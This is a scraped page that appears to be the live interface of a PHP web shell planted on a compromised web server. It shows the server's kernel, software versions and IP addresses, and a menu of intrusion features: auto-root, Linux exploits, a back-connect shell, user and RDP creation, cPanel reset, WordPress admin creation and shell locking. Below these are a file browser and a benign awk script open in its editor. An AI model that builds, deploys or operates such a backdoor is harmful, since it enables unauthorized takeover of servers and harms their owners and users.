Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
xcache-3.2.0 /
devel /
[ HOME SHELL ]
Name
Size
Permission
Action
graph
[ DIR ]
drwxrwxr-x
gen_const_string_opcodes.awk
1.34
KB
-rwxrwxr-x
gen_xc_opcode_spec.awk
745
B
-rwxrwxr-x
lsnewini
244
B
-rwxrwxr-x
make
33
B
-rwxrwxr-x
po2php.awk
895
B
-rwxrwxr-x
prepare.cfg.example
217
B
-rw-rw-r--
prepare.mak
4.77
KB
-rw-rw-r--
run
7.93
KB
-rwxrwxr-x
sample.cpp.php
11.66
KB
-rw-rw-r--
test.mak
496
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : po2php.awk
#!/usr/bin/awk -f BEGIN { print "<?php"; print "// auto generated, do not modify"; print "$strings += array("; } function flushOut() { if (section) { if (section == "msgstr") { if (msgid == "") { } else if (msgstr == "") { } else { print "\t\t\""msgid"\""; print "\t\t=> \""msgstr"\","; } } else { print "unexpected section " section; exit 1; } section = null; } } /^msgid ".*"$/ { $0 = gensub(/^msgid "(.*)"$/, "\\1", $0); section = "msgid"; msgid = $0; next; } /^msgstr ".*"$/ { $0 = gensub(/^msgstr "(.*)"$/, "\\1", $0); section = "msgstr"; msgstr = $0; next; } /^".*"$/ { $0 = gensub(/^"(.*)"$/, "\\1", $0); if (section == "msgid") { msgid = msgid $0; } else { msgstr = msgstr $0; } next; } /^$/ { flushOut(); next; } /^#/ { next; } /./ { print "error", $0; exit 1; } END { flushOut(); print "\t\t);"; print ""; }
Close